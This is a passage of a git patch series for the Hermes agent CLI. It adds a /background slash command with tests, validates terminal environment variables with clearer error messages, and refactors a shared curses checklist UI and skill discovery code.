+                return agent.run_conversation(
+                    user_message=prompt,
+                    task_id=task_id,
+                )
+
+            loop = asyncio.get_event_loop()
+            result = await loop.run_in_executor(None, run_sync)
+
+            response = result.get("final_response", "") if result else ""
+            if not response and result and result.get("error"):
+                response = f"Error: {result['error']}"
+
+            # Extract media files from the response
+            if response:
+                media_files, response = adapter.extract_media(response)
+                images, text_content = adapter.extract_images(response)
+
+                preview = prompt[:60] + ("..." if len(prompt) > 60 else "")
+                header = f'✅ Background task complete\nPrompt: "{preview}"\n\n'
+
+                if text_content:
+                    await adapter.send(
+                        chat_id=source.chat_id,
+                        content=header + text_content,
+                        metadata=_thread_metadata,
+                    )
+                elif not images and not media_files:
+                    await adapter.send(
+                        chat_id=source.chat_id,
+                        content=header + "(No response generated)",
+                        metadata=_thread_metadata,
+                    )
+
+                # Send extracted images
+                for image_url, alt_text in (images or []):
+                    try:
+                        await adapter.send_image(
+                            chat_id=source.chat_id,
+                            image_url=image_url,
+                            caption=alt_text,
+                        )
+                    except Exception:
+                        pass
+
+                # Send media files
+                for media_path in (media_files or []):
+                    try:
+                        await adapter.send_file(
+                            chat_id=source.chat_id,
+                            file_path=media_path,
+                        )
+                    except Exception:
+                        pass
+            else:
+                preview = prompt[:60] + ("..." if len(prompt) > 60 else "")
+                await adapter.send(
+                    chat_id=source.chat_id,
+                    content=f'✅ Background task complete\nPrompt: "{preview}"\n\n(No response generated)',
+                    metadata=_thread_metadata,
+                )
+
+        except Exception as e:
+            logger.exception("Background task %s failed", task_id)
+            try:
+                await adapter.send(
+                    chat_id=source.chat_id,
+                    content=f"❌ Background task {task_id} failed: {e}",
+                    metadata=_thread_metadata,
+                )
+            except Exception:
+                pass
+
     async def _handle_compress_command(self, event: MessageEvent) -> str:
         """Handle /compress command -- manually compress conversation context."""
         source = event.source
diff --git a/hermes_cli/commands.py b/hermes_cli/commands.py
index 0d9a796b..22e56b3f 100644
--- a/hermes_cli/commands.py
+++ b/hermes_cli/commands.py
@@ -26,6 +26,7 @@ COMMANDS_BY_CATEGORY = {
         "/title": "Set a title for the current session (usage: /title My Session Name)",
         "/compress": "Manually compress conversation context (flush memories + summarize)",
         "/rollback": "List or restore filesystem checkpoints (usage: /rollback [number])",
+        "/background": "Run a prompt in the background (usage: /background <prompt>)",
     },
     "Configuration": {
         "/config": "Show current configuration",
diff --git a/tests/gateway/test_background_command.py b/tests/gateway/test_background_command.py
new file mode 100644
index 00000000..6a780fb1
--- /dev/null
+++ b/tests/gateway/test_background_command.py
@@ -0,0 +1,305 @@
+"""Tests for /background gateway slash command.
+
+Tests the _handle_background_command handler (run a prompt in a separate
+background session) across gateway messenger platforms.
+"""
+
+import asyncio
+import os
+from unittest.mock import AsyncMock, MagicMock, patch
+
+import pytest
+
+from gateway.config import Platform
+from gateway.platforms.base import MessageEvent
+from gateway.session import SessionSource
+
+
+def _make_event(text="/background", platform=Platform.TELEGRAM,
+                user_id="12345", chat_id="67890"):
+    """Build a MessageEvent for testing."""
+    source = SessionSource(
+        platform=platform,
+        user_id=user_id,
+        chat_id=chat_id,
+        user_name="testuser",
+    )
+    return MessageEvent(text=text, source=source)
+
+
+def _make_runner():
+    """Create a bare GatewayRunner with minimal mocks."""
+    from gateway.run import GatewayRunner
+    runner = object.__new__(GatewayRunner)
+    runner.adapters = {}
+    runner._session_db = None
+    runner._reasoning_config = None
+    runner._provider_routing = {}
+    runner._fallback_model = None
+    runner._running_agents = {}
+
+    mock_store = MagicMock()
+    runner.session_store = mock_store
+
+    from gateway.hooks import HookRegistry
+    runner.hooks = HookRegistry()
+
+    return runner
+
+
+# ---------------------------------------------------------------------------
+# _handle_background_command
+# ---------------------------------------------------------------------------
+
+
+class TestHandleBackgroundCommand:
+    """Tests for GatewayRunner._handle_background_command."""
+
+    @pytest.mark.asyncio
+    async def test_no_prompt_shows_usage(self):
+        """Running /background with no prompt shows usage."""
+        runner = _make_runner()
+        event = _make_event(text="/background")
+        result = await runner._handle_background_command(event)
+        assert "Usage:" in result
+        assert "/background" in result
+
+    @pytest.mark.asyncio
+    async def test_empty_prompt_shows_usage(self):
+        """Running /background with only whitespace shows usage."""
+        runner = _make_runner()
+        event = _make_event(text="/background   ")
+        result = await runner._handle_background_command(event)
+        assert "Usage:" in result
+
+    @pytest.mark.asyncio
+    async def test_valid_prompt_starts_task(self):
+        """Running /background with a prompt returns confirmation and starts task."""
+        runner = _make_runner()
+
+        # Patch asyncio.create_task to capture the coroutine
+        created_tasks = []
+        original_create_task = asyncio.create_task
+
+        def capture_task(coro, *args, **kwargs):
+            # Close the coroutine to avoid warnings
+            coro.close()
+            mock_task = MagicMock()
+            created_tasks.append(mock_task)
+            return mock_task
+
+        with patch("gateway.run.asyncio.create_task", side_effect=capture_task):
+            event = _make_event(text="/background Summarize the top HN stories")
+            result = await runner._handle_background_command(event)
+
+        assert "🔄" in result
+        assert "Background task started" in result
+        assert "bg_" in result  # task ID starts with bg_
+        assert "Summarize the top HN stories" in result
+        assert len(created_tasks) == 1  # background task was created
+
+    @pytest.mark.asyncio
+    async def test_prompt_truncated_in_preview(self):
+        """Long prompts are truncated to 60 chars in the confirmation message."""
+        runner = _make_runner()
+        long_prompt = "A" * 100
+
+        with patch("gateway.run.asyncio.create_task", side_effect=lambda c, **kw: (c.close(), MagicMock())[1]):
+            event = _make_event(text=f"/background {long_prompt}")
+            result = await runner._handle_background_command(event)
+
+        assert "..." in result
+        # Should not contain the full prompt
+        assert long_prompt not in result
+
+    @pytest.mark.asyncio
+    async def test_task_id_is_unique(self):
+        """Each background task gets a unique task ID."""
+        runner = _make_runner()
+        task_ids = set()
+
+        with patch("gateway.run.asyncio.create_task", side_effect=lambda c, **kw: (c.close(), MagicMock())[1]):
+            for i in range(5):
+                event = _make_event(text=f"/background task {i}")
+                result = await runner._handle_background_command(event)
+                # Extract task ID from result (format: "Task ID: bg_HHMMSS_hex")
+                for line in result.split("\n"):
+                    if "Task ID:" in line:
+                        tid = line.split("Task ID:")[1].strip()
+                        task_ids.add(tid)
+
+        assert len(task_ids) == 5  # all unique
+
+    @pytest.mark.asyncio
+    async def test_works_across_platforms(self):
+        """The /background command works for all platforms."""
+        for platform in [Platform.TELEGRAM, Platform.DISCORD, Platform.SLACK]:
+            runner = _make_runner()
+            with patch("gateway.run.asyncio.create_task", side_effect=lambda c, **kw: (c.close(), MagicMock())[1]):
+                event = _make_event(
+                    text="/background test task",
+                    platform=platform,
+                )
+                result = await runner._handle_background_command(event)
+                assert "Background task started" in result
+
+
+# ---------------------------------------------------------------------------
+# _run_background_task
+# ---------------------------------------------------------------------------
+
+
+class TestRunBackgroundTask:
+    """Tests for GatewayRunner._run_background_task (the actual execution)."""
+
+    @pytest.mark.asyncio
+    async def test_no_adapter_returns_silently(self):
+        """When no adapter is available, the task returns without error."""
+        runner = _make_runner()
+        source = SessionSource(
+            platform=Platform.TELEGRAM,
+            user_id="12345",
+            chat_id="67890",
+            user_name="testuser",
+        )
+        # No adapters set — should not raise
+        await runner._run_background_task("test prompt", source, "bg_test")
+
+    @pytest.mark.asyncio
+    async def test_no_credentials_sends_error(self):
+        """When provider credentials are missing, an error is sent."""
+        runner = _make_runner()
+        mock_adapter = AsyncMock()
+        mock_adapter.send = AsyncMock()
+        runner.adapters[Platform.TELEGRAM] = mock_adapter
+
+        source = SessionSource(
+            platform=Platform.TELEGRAM,
+            user_id="12345",
+            chat_id="67890",
+            user_name="testuser",
+        )
+
+        with patch("gateway.run._resolve_runtime_agent_kwargs", return_value={"api_key": None}):
+            await runner._run_background_task("test prompt", source, "bg_test")
+
+        # Should have sent an error message
+        mock_adapter.send.assert_called_once()
+        call_args = mock_adapter.send.call_args
+        assert "failed" in call_args[1].get("content", call_args[0][1] if len(call_args[0]) > 1 else "").lower()
+
+    @pytest.mark.asyncio
+    async def test_successful_task_sends_result(self):
+        """When the agent completes successfully, the result is sent."""
+        runner = _make_runner()
+        mock_adapter = AsyncMock()
+        mock_adapter.send = AsyncMock()
+        mock_adapter.extract_media = MagicMock(return_value=([], "Hello from background!"))
+        mock_adapter.extract_images = MagicMock(return_value=([], "Hello from background!"))
+        runner.adapters[Platform.TELEGRAM] = mock_adapter
+
+        source = SessionSource(
+            platform=Platform.TELEGRAM,
+            user_id="12345",
+            chat_id="67890",
+            user_name="testuser",
+        )
+
+        mock_result = {"final_response": "Hello from background!", "messages": []}
+
+        with patch("gateway.run._resolve_runtime_agent_kwargs", return_value={"api_key": "test-key"}), \
+             patch("run_agent.AIAgent") as MockAgent:
+            mock_agent_instance = MagicMock()
+            mock_agent_instance.run_conversation.return_value = mock_result
+            MockAgent.return_value = mock_agent_instance
+
+            await runner._run_background_task("say hello", source, "bg_test")
+
+        # Should have sent the result
+        mock_adapter.send.assert_called_once()
+        call_args = mock_adapter.send.call_args
+        content = call_args[1].get("content", call_args[0][1] if len(call_args[0]) > 1 else "")
+        assert "Background task complete" in content
+        assert "Hello from background!" in content
+
+    @pytest.mark.asyncio
+    async def test_exception_sends_error_message(self):
+        """When the agent raises an exception, an error message is sent."""
+        runner = _make_runner()
+        mock_adapter = AsyncMock()
+        mock_adapter.send = AsyncMock()
+        runner.adapters[Platform.TELEGRAM] = mock_adapter
+
+        source = SessionSource(
+            platform=Platform.TELEGRAM,
+            user_id="12345",
+            chat_id="67890",
+            user_name="testuser",
+        )
+
+        with patch("gateway.run._resolve_runtime_agent_kwargs", side_effect=RuntimeError("boom")):
+            await runner._run_background_task("test prompt", source, "bg_test")
+
+        mock_adapter.send.assert_called_once()
+        call_args = mock_adapter.send.call_args
+        content = call_args[1].get("content", call_args[0][1] if len(call_args[0]) > 1 else "")
+        assert "failed" in content.lower()
+
+
+# ---------------------------------------------------------------------------
+# /background in help and known_commands
+# ---------------------------------------------------------------------------
+
+
+class TestBackgroundInHelp:
+    """Verify /background appears in help text and known commands."""
+
+    @pytest.mark.asyncio
+    async def test_background_in_help_output(self):
+        """The /help output includes /background."""
+        runner = _make_runner()
+        event = _make_event(text="/help")
+        result = await runner._handle_help_command(event)
+        assert "/background" in result
+
+    def test_background_is_known_command(self):
+        """The /background command is in the _known_commands set."""
+        from gateway.run import GatewayRunner
+        import inspect
+        source = inspect.getsource(GatewayRunner._handle_message)
+        assert '"background"' in source
+
+
+# ---------------------------------------------------------------------------
+# CLI /background command definition
+# ---------------------------------------------------------------------------
+
+
+class TestBackgroundInCLICommands:
+    """Verify /background is registered in the CLI command system."""
+
+    def test_background_in_commands_dict(self):
+        """The /background command is in the COMMANDS dict."""
+        from hermes_cli.commands import COMMANDS
+        assert "/background" in COMMANDS
+
+    def test_background_in_session_category(self):
+        """The /background command is in the Session category."""
+        from hermes_cli.commands import COMMANDS_BY_CATEGORY
+        assert "/background" in COMMANDS_BY_CATEGORY["Session"]
+
+    def test_background_autocompletes(self):
+        """The /background command appears in autocomplete results."""
+        from hermes_cli.commands import SlashCommandCompleter
+        from prompt_toolkit.document import Document
+
+        completer = SlashCommandCompleter()
+        doc = Document("backgro")  # Partial match
+        completions = list(completer.get_completions(doc, None))
+        # Text doesn't start with / so no completions
+        assert len(completions) == 0
+
+        doc = Document("/backgro")  # With slash prefix
+        completions = list(completer.get_completions(doc, None))
+        cmd_displays = [str(c.display) for c in completions]
+        assert any("/background" in d for d in cmd_displays)
diff --git a/tests/hermes_cli/test_commands.py b/tests/hermes_cli/test_commands.py
index ec81fbee..0aead5c3 100644
--- a/tests/hermes_cli/test_commands.py
+++ b/tests/hermes_cli/test_commands.py
@@ -12,7 +12,7 @@ EXPECTED_COMMANDS = {
     "/personality", "/clear", "/history", "/new", "/reset", "/retry",
     "/undo", "/save", "/config", "/cron", "/skills", "/platforms",
     "/verbose", "/compress", "/title", "/usage", "/insights", "/paste",
-    "/reload-mcp", "/rollback", "/skin", "/quit",
+    "/reload-mcp", "/rollback", "/background", "/skin", "/quit",
 }
 
 

From 4523cc09cfe60861490a47e89b38a233c401d417 Mon Sep 17 00:00:00 2001
From: alireza78a <alireza78.crypto@gmail.com>
Date: Mon, 9 Mar 2026 19:35:24 +0330
Subject: [PATCH 064/105] fix(terminal): validate env var types with clear
 error messages

---
 tools/terminal_tool.py | 31 ++++++++++++++++++++++++-------
 1 file changed, 24 insertions(+), 7 deletions(-)

diff --git a/tools/terminal_tool.py b/tools/terminal_tool.py
index b8c3a66f..18d1629e 100644
--- a/tools/terminal_tool.py
+++ b/tools/terminal_tool.py
@@ -434,6 +434,23 @@ def clear_task_env_overrides(task_id: str):
     _task_env_overrides.pop(task_id, None)
 
 # Configuration from environment variables
+
+def _parse_env_var(name: str, default: str, converter=int, type_label: str = "integer"):
+    """Parse an environment variable with *converter*, raising a clear error on bad values.
+
+    Without this wrapper, a single malformed env var (e.g. TERMINAL_TIMEOUT=5m)
+    causes an unhandled ValueError that kills every terminal command.
+    """
+    raw = os.getenv(name, default)
+    try:
+        return converter(raw)
+    except (ValueError, json.JSONDecodeError):
+        raise ValueError(
+            f"Invalid value for {name}: {raw!r} (expected {type_label}). "
+            f"Check ~/.hermes/.env or environment variables."
+        )
+
+
 def _get_env_config() -> Dict[str, Any]:
     """Get terminal environment configuration from environment variables."""
     # Default image with Python and Node.js for maximum compatibility
@@ -470,19 +487,19 @@ def _get_env_config() -> Dict[str, Any]:
         "modal_image": os.getenv("TERMINAL_MODAL_IMAGE", default_image),
         "daytona_image": os.getenv("TERMINAL_DAYTONA_IMAGE", default_image),
         "cwd": cwd,
-        "timeout": int(os.getenv("TERMINAL_TIMEOUT", "180")),
-        "lifetime_seconds": int(os.getenv("TERMINAL_LIFETIME_SECONDS", "300")),
+        "timeout": _parse_env_var("TERMINAL_TIMEOUT", "180"),
+        "lifetime_seconds": _parse_env_var("TERMINAL_LIFETIME_SECONDS", "300"),
         # SSH-specific config
         "ssh_host": os.getenv("TERMINAL_SSH_HOST", ""),
         "ssh_user": os.getenv("TERMINAL_SSH_USER", ""),
-        "ssh_port": int(os.getenv("TERMINAL_SSH_PORT", "22")),
+        "ssh_port": _parse_env_var("TERMINAL_SSH_PORT", "22"),
         "ssh_key": os.getenv("TERMINAL_SSH_KEY", ""),
         # Container resource config (applies to docker, singularity, modal, daytona -- ignored for local/ssh)
-        "container_cpu": float(os.getenv("TERMINAL_CONTAINER_CPU", "1")),
-        "container_memory": int(os.getenv("TERMINAL_CONTAINER_MEMORY", "5120")),     # MB (default 5GB)
-        "container_disk": int(os.getenv("TERMINAL_CONTAINER_DISK", "51200")),        # MB (default 50GB)
+        "container_cpu": _parse_env_var("TERMINAL_CONTAINER_CPU", "1", float, "number"),
+        "container_memory": _parse_env_var("TERMINAL_CONTAINER_MEMORY", "5120"),     # MB (default 5GB)
+        "container_disk": _parse_env_var("TERMINAL_CONTAINER_DISK", "51200"),        # MB (default 50GB)
         "container_persistent": os.getenv("TERMINAL_CONTAINER_PERSISTENT", "true").lower() in ("true", "1", "yes"),
-        "docker_volumes": json.loads(os.getenv("TERMINAL_DOCKER_VOLUMES", "[]")),
+        "docker_volumes": _parse_env_var("TERMINAL_DOCKER_VOLUMES", "[]", json.loads, "valid JSON"),
     }
 
 

From f1510ec33e9be6109b8f93eadbb91ce17395c306 Mon Sep 17 00:00:00 2001
From: alireza78a <alireza78.crypto@gmail.com>
Date: Mon, 9 Mar 2026 19:44:15 +0330
Subject: [PATCH 065/105] test(terminal): add tests for env var validation in
 _get_env_config

---
 tests/tools/test_parse_env_var.py | 64 +++++++++++++++++++++++++++++++
 1 file changed, 64 insertions(+)
 create mode 100644 tests/tools/test_parse_env_var.py

diff --git a/tests/tools/test_parse_env_var.py b/tests/tools/test_parse_env_var.py
new file mode 100644
index 00000000..48c282bc
--- /dev/null
+++ b/tests/tools/test_parse_env_var.py
@@ -0,0 +1,64 @@
+"""Tests for _parse_env_var and _get_env_config env-var validation."""
+
+import json
+from unittest.mock import patch
+
+import pytest
+
+import sys
+import tools.terminal_tool  # noqa: F401 -- ensure module is loaded
+_tt_mod = sys.modules["tools.terminal_tool"]
+from tools.terminal_tool import _parse_env_var
+
+
+class TestParseEnvVar:
+    """Unit tests for _parse_env_var."""
+
+    # -- valid values work normally --
+
+    def test_valid_int(self):
+        with patch.dict("os.environ", {"TERMINAL_TIMEOUT": "300"}):
+            assert _parse_env_var("TERMINAL_TIMEOUT", "180") == 300
+
+    def test_valid_float(self):
+        with patch.dict("os.environ", {"TERMINAL_CONTAINER_CPU": "2.5"}):
+            assert _parse_env_var("TERMINAL_CONTAINER_CPU", "1", float, "number") == 2.5
+
+    def test_valid_json(self):
+        volumes = '["/host:/container"]'
+        with patch.dict("os.environ", {"TERMINAL_DOCKER_VOLUMES": volumes}):
+            result = _parse_env_var("TERMINAL_DOCKER_VOLUMES", "[]", json.loads, "valid JSON")
+            assert result == ["/host:/container"]
+
+    def test_falls_back_to_default(self):
+        with patch.dict("os.environ", {}, clear=False):
+            # Remove the var if it exists, rely on default
+            import os
+            env = os.environ.copy()
+            env.pop("TERMINAL_TIMEOUT", None)
+            with patch.dict("os.environ", env, clear=True):
+                assert _parse_env_var("TERMINAL_TIMEOUT", "180") == 180
+
+    # -- invalid int raises ValueError with env var name --
+
+    def test_invalid_int_raises_with_var_name(self):
+        with patch.dict("os.environ", {"TERMINAL_TIMEOUT": "5m"}):
+            with pytest.raises(ValueError, match="TERMINAL_TIMEOUT"):
+                _parse_env_var("TERMINAL_TIMEOUT", "180")
+
+    def test_invalid_int_includes_bad_value(self):
+        with patch.dict("os.environ", {"TERMINAL_SSH_PORT": "ssh"}):
+            with pytest.raises(ValueError, match="ssh"):
+                _parse_env_var("TERMINAL_SSH_PORT", "22")
+
+    # -- invalid JSON raises ValueError with env var name --
+
+    def test_invalid_json_raises_with_var_name(self):
+        with patch.dict("os.environ", {"TERMINAL_DOCKER_VOLUMES": "/host:/container"}):
+            with pytest.raises(ValueError, match="TERMINAL_DOCKER_VOLUMES"):
+                _parse_env_var("TERMINAL_DOCKER_VOLUMES", "[]", json.loads, "valid JSON")
+
+    def test_invalid_json_includes_type_label(self):
+        with patch.dict("os.environ", {"TERMINAL_DOCKER_VOLUMES": "not json"}):
+            with pytest.raises(ValueError, match="valid JSON"):
+                _parse_env_var("TERMINAL_DOCKER_VOLUMES", "[]", json.loads, "valid JSON")

From 4864a5684a1c58a141964530c397f6360f1202af Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Wed, 11 Mar 2026 03:06:15 -0700
Subject: [PATCH 066/105] refactor: extract shared curses checklist, fix skill
 discovery perf
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Four cleanups to code merged today:

1. New hermes_cli/curses_ui.py — shared curses_checklist() used by both
   hermes tools and hermes skills. Eliminates ~140 lines of near-identical
   curses code (scrolling, key handling, color setup, numbered fallback).

2. Fix _find_all_skills() perf — was calling load_config() per skill
   (~100+ YAML parses). Now loads disabled set once via
   _get_disabled_skill_names() and does a set lookup.

3. Eliminate _list_all_skills_unfiltered() duplication — _find_all_skills()
   now accepts skip_disabled=True for the config UI, removing 30 lines
   of copy-pasted discovery logic from skills_config.py.

4. Fix fragile label round-trip in skills_command — was building label
   strings, passing to checklist, then mapping labels back to skill names
   (collision-prone). Now works with indices directly, like tools_config.
---
 hermes_cli/curses_ui.py                | 140 ++++++++++++++++
 hermes_cli/skills_config.py            | 220 +++++--------------------
 hermes_cli/tools_config.py             | 113 ++-----------
 tests/hermes_cli/test_skills_config.py |  27 ++-
 tools/skills_tool.py                   |  76 +++++----
 5 files changed, 257 insertions(+), 319 deletions(-)
 create mode 100644 hermes_cli/curses_ui.py

diff --git a/hermes_cli/curses_ui.py b/hermes_cli/curses_ui.py
new file mode 100644
index 00000000..f819b1ff
--- /dev/null
+++ b/hermes_cli/curses_ui.py
@@ -0,0 +1,140 @@
+"""Shared curses-based UI components for Hermes CLI.
+
+Used by `hermes tools` and `hermes skills` for interactive checklists.
+Provides a curses multi-select with keyboard navigation, plus a
+text-based numbered fallback for terminals without curses support.
+"""
+from typing import List, Set
+
+from hermes_cli.colors import Colors, color
+
+
+def curses_checklist(
+    title: str,
+    items: List[str],
+    selected: Set[int],
+    *,
+    cancel_returns: Set[int] | None = None,
+) -> Set[int]:
+    """Curses multi-select checklist. Returns set of selected indices.
+
+    Args:
+        title: Header line displayed above the checklist.
+        items: Display labels for each row.
+        selected: Indices that start checked (pre-selected).
+        cancel_returns: Returned on ESC/q. Defaults to the original *selected*.
+    """
+    if cancel_returns is None:
+        cancel_returns = set(selected)
+
+    try:
+        import curses
+        chosen = set(selected)
+        result_holder: list = [None]
+
+        def _draw(stdscr):
+            curses.curs_set(0)
+            if curses.has_colors():
+                curses.start_color()
+                curses.use_default_colors()
+                curses.init_pair(1, curses.COLOR_GREEN, -1)
+                curses.init_pair(2, curses.COLOR_YELLOW, -1)
+                curses.init_pair(3, 8, -1)  # dim gray
+            cursor = 0
+            scroll_offset = 0
+
+            while True:
+                stdscr.clear()
+                max_y, max_x = stdscr.getmaxyx()
+
+                # Header
+                try:
+                    hattr = curses.A_BOLD
+                    if curses.has_colors():
+                        hattr |= curses.color_pair(2)
+                    stdscr.addnstr(0, 0, title, max_x - 1, hattr)
+                    stdscr.addnstr(
+                        1, 0,
+                        "  ↑↓ navigate  SPACE toggle  ENTER confirm  ESC cancel",
+                        max_x - 1, curses.A_DIM,
+                    )
+                except curses.error:
+                    pass
+
+                # Scrollable item list
+                visible_rows = max_y - 3
+                if cursor < scroll_offset:
+                    scroll_offset = cursor
+                elif cursor >= scroll_offset + visible_rows:
+                    scroll_offset = cursor - visible_rows + 1
+
+                for draw_i, i in enumerate(
+                    range(scroll_offset, min(len(items), scroll_offset + visible_rows))
+                ):
+                    y = draw_i + 3
+                    if y >= max_y - 1:
+                        break
+                    check = "✓" if i in chosen else " "
+                    arrow = "→" if i == cursor else " "
+                    line = f" {arrow} [{check}] {items[i]}"
+                    attr = curses.A_NORMAL
+                    if i == cursor:
+                        attr = curses.A_BOLD
+                        if curses.has_colors():
+                            attr |= curses.color_pair(1)
+                    try:
+                        stdscr.addnstr(y, 0, line, max_x - 1, attr)
+                    except curses.error:
+                        pass
+
+                stdscr.refresh()
+                key = stdscr.getch()
+
+                if key in (curses.KEY_UP, ord("k")):
+                    cursor = (cursor - 1) % len(items)
+                elif key in (curses.KEY_DOWN, ord("j")):
+                    cursor = (cursor + 1) % len(items)
+                elif key == ord(" "):
+                    chosen.symmetric_difference_update({cursor})
+                elif key in (curses.KEY_ENTER, 10, 13):
+                    result_holder[0] = set(chosen)
+                    return
+                elif key in (27, ord("q")):
+                    result_holder[0] = cancel_returns
+                    return
+
+        curses.wrapper(_draw)
+        return result_holder[0] if result_holder[0] is not None else cancel_returns
+
+    except Exception:
+        return _numbered_fallback(title, items, selected, cancel_returns)
+
+
+def _numbered_fallback(
+    title: str,
+    items: List[str],
+    selected: Set[int],
+    cancel_returns: Set[int],
+) -> Set[int]:
+    """Text-based toggle fallback for terminals without curses."""
+    chosen = set(selected)
+    print(color(f"\n  {title}", Colors.YELLOW))
+    print(color("  Toggle by number, Enter to confirm.\n", Colors.DIM))
+
+    while True:
+        for i, label in enumerate(items):
+            marker = color("[✓]", Colors.GREEN) if i in chosen else "[ ]"
+            print(f"  {marker} {i + 1:>2}. {label}")
+        print()
+        try:
+            val = input(color("  Toggle # (or Enter to confirm): ", Colors.DIM)).strip()
+            if not val:
+                break
+            idx = int(val) - 1
+            if 0 <= idx < len(items):
+                chosen.symmetric_difference_update({idx})
+        except (ValueError, KeyboardInterrupt, EOFError):
+            return cancel_returns
+        print()
+
+    return chosen
diff --git a/hermes_cli/skills_config.py b/hermes_cli/skills_config.py
index 256f7ba5..56abed8e 100644
--- a/hermes_cli/skills_config.py
+++ b/hermes_cli/skills_config.py
@@ -11,7 +11,8 @@ Config stored in ~/.hermes/config.yaml under:
       telegram: [skill-c]
       cli: []
 """
-from typing import Dict, List, Set, Optional
+from typing import Dict, List, Optional, Set
+
 from hermes_cli.config import load_config, save_config
 from hermes_cli.colors import Colors, color
 
@@ -48,163 +49,23 @@ def save_disabled_skills(config: dict, disabled: Set[str], platform: Optional[st
     save_config(config)
 
 
-# ─── Skill Discovery ──────────────────────────────────────────────────────────
+# ─── Skill Discovery ─────────────────────────────────────────────────────────
 
-def _list_all_skills_unfiltered() -> List[dict]:
-    """Return all installed skills ignoring disabled state."""
+def _list_all_skills() -> List[dict]:
+    """Return all installed skills (ignoring disabled state)."""
     try:
-        from tools.skills_tool import SKILLS_DIR, _parse_frontmatter, skill_matches_platform, _get_category_from_path, MAX_NAME_LENGTH, MAX_DESCRIPTION_LENGTH
-        skills = []
-        if not SKILLS_DIR.exists():
-            return skills
-        for skill_md in SKILLS_DIR.rglob("SKILL.md"):
-            if any(part in ('.git', '.github', '.hub') for part in skill_md.parts):
-                continue
-            skill_dir = skill_md.parent
-            try:
-                content = skill_md.read_text(encoding='utf-8')
-                frontmatter, body = _parse_frontmatter(content)
-                if not skill_matches_platform(frontmatter):
-                    continue
-                name = frontmatter.get('name', skill_dir.name)[:MAX_NAME_LENGTH]
-                description = frontmatter.get('description', '')
-                if not description:
-                    for line in body.strip().split('\n'):
-                        line = line.strip()
-                        if line and not line.startswith('#'):
-                            description = line
-                            break
-                if len(description) > MAX_DESCRIPTION_LENGTH:
-                    description = description[:MAX_DESCRIPTION_LENGTH - 3] + "..."
-                category = _get_category_from_path(skill_md)
-                skills.append({"name": name, "description": description, "category": category})
-            except Exception:
-                continue
-        return skills
+        from tools.skills_tool import _find_all_skills
+        return _find_all_skills(skip_disabled=True)
     except Exception:
         return []
 
 
 def _get_categories(skills: List[dict]) -> List[str]:
     """Return sorted unique category names (None -> 'uncategorized')."""
-    cats = set()
-    for s in skills:
-        cats.add(s["category"] or "uncategorized")
-    return sorted(cats)
+    return sorted({s["category"] or "uncategorized" for s in skills})
 
 
-# ─── Checklist UI ─────────────────────────────────────────────────────────────
-
-def _prompt_checklist(title: str, items: List[str], disabled_items: Set[str]) -> Set[str]:
-    """Generic curses multi-select. Returns set of DISABLED item names."""
-    pre_disabled = {i for i, item in enumerate(items) if item in disabled_items}
-
-    try:
-        import curses
-        selected = set(pre_disabled)
-        result_holder = [None]
-
-        def _curses_ui(stdscr):
-            curses.curs_set(0)
-            if curses.has_colors():
-                curses.start_color()
-                curses.use_default_colors()
-                curses.init_pair(1, curses.COLOR_GREEN, -1)
-                curses.init_pair(2, curses.COLOR_YELLOW, -1)
-                curses.init_pair(3, 8, -1)  # dim gray
-            cursor = 0
-            scroll_offset = 0
-            while True:
-                stdscr.clear()
-                max_y, max_x = stdscr.getmaxyx()
-                try:
-                    hattr = curses.A_BOLD | (curses.color_pair(2) if curses.has_colors() else 0)
-                    stdscr.addnstr(0, 0, title, max_x - 1, hattr)
-                    stdscr.addnstr(1, 0, "  ↑↓ navigate  SPACE toggle  ENTER confirm  ESC cancel", max_x - 1,
-                                   curses.A_DIM)
-                except curses.error:
-                    pass
-                visible_rows = max_y - 3
-                if cursor < scroll_offset:
-                    scroll_offset = cursor
-                elif cursor >= scroll_offset + visible_rows:
-                    scroll_offset = cursor - visible_rows + 1
-                for draw_i, i in enumerate(range(scroll_offset, min(len(items), scroll_offset + visible_rows))):
-                    y = draw_i + 3
-                    if y >= max_y - 1:
-                        break
-                    is_disabled = i in selected
-                    check = " " if is_disabled else "✓"
-                    arrow = "→" if i == cursor else " "
-                    line = f" {arrow} [{check}] {items[i]}"
-                    attr = curses.A_NORMAL
-                    if i == cursor:
-                        attr = curses.A_BOLD
-                        if curses.has_colors():
-                            attr |= curses.color_pair(1)
-                    try:
-                        stdscr.addnstr(y, 0, line, max_x - 1, attr)
-                    except curses.error:
-                        pass
-                stdscr.refresh()
-                key = stdscr.getch()
-                if key in (curses.KEY_UP, ord('k')):
-                    cursor = (cursor - 1) % len(items)
-                elif key in (curses.KEY_DOWN, ord('j')):
-                    cursor = (cursor + 1) % len(items)
-                elif key == ord(' '):
-                    if cursor in selected:
-                        selected.discard(cursor)
-                    else:
-                        selected.add(cursor)
-                elif key in (curses.KEY_ENTER, 10, 13):
-                    result_holder[0] = {items[i] for i in selected}
-                    return
-                elif key in (27, ord('q')):
-                    result_holder[0] = disabled_items
-                    return
-
-        curses.wrapper(_curses_ui)
-        return result_holder[0] if result_holder[0] is not None else disabled_items
-
-    except Exception:
-        return _numbered_toggle(title, items, disabled_items)
-
-
-def _numbered_toggle(title: str, items: List[str], disabled: Set[str]) -> Set[str]:
-    """Fallback text-based toggle."""
-    current = set(disabled)
-    while True:
-        print()
-        print(color(f"{title}", Colors.BOLD))
-        for i, item in enumerate(items, 1):
-            mark = "✓" if item not in current else " "
-            print(f"  {i:3}. [{mark}] {item}")
-        print()
-        print(color("  Number to toggle, 's' save, 'q' cancel:", Colors.DIM))
-        try:
-            raw = input("> ").strip()
-        except (KeyboardInterrupt, EOFError):
-            return disabled
-        if raw.lower() == 's':
-            return current
-        if raw.lower() == 'q':
-            return disabled
-        try:
-            idx = int(raw) - 1
-            if 0 <= idx < len(items):
-                name = items[idx]
-                if name in current:
-                    current.discard(name)
-                    print(color(f"  ✓ {name} enabled", Colors.GREEN))
-                else:
-                    current.add(name)
-                    print(color(f"  ✗ {name} disabled", Colors.DIM))
-        except ValueError:
-            print(color("  Invalid input", Colors.DIM))
-
-
-# ─── Platform Selection ───────────────────────────────────────────────────────
+# ─── Platform Selection ──────────────────────────────────────────────────────
 
 def _select_platform() -> Optional[str]:
     """Ask user which platform to configure, or global."""
@@ -230,29 +91,34 @@ def _select_platform() -> Optional[str]:
     return None
 
 
-# ─── Category Toggle ──────────────────────────────────────────────────────────
+# ─── Category Toggle ─────────────────────────────────────────────────────────
 
